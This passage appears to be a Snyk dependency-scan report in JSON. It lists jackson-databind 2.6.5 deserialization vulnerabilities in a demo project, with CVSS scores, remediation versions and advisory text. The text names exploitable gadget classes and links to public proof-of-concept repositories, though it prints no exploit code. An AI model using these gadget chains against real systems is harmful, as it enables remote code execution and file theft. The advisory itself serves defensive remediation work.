([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. 
The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36189" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:37:54.679882Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:37:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.089230Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.824076Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36188", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + 
"baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:42.488317Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36188" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:39:28.531700Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:32Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:03.468032Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Poc" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.757298Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36181" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:41:09.172252Z", + "functions_new": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.686589Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Yangkun (ICSL)" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2854", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7", + "title": "GitHub Release" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": 
"2024-03-11T09:50:15.847219Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:04.169362Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:15.847219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n", + "epssDetails": { + "percentile": "0.74700", + "probability": "0.00431", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-20190" + ], + "CWE": [ + "CWE-502", + "CWE-918" + ], + "GHSA": [ + "GHSA-5949-rw7g-wx7w" + ], + "RHSA": [ + "RHSA-1610966837463990" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-18T12:50:16.466618Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-16T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-18T17:23:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:17.193594Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9)", + "[2.8.0,2.8.11.4)", + "[2.7.0,2.7.9.6)", + "[,2.6.7.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9", + "2.8.11.4", + "2.7.9.6", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using MySQL database" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2326", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9", + "title": "Github Release Tag" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12086", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "assigner": "Red Hat", + "severity": 
"high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:55.897269Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n", + "epssDetails": { + "percentile": "0.74218", + "probability": "0.00415", + 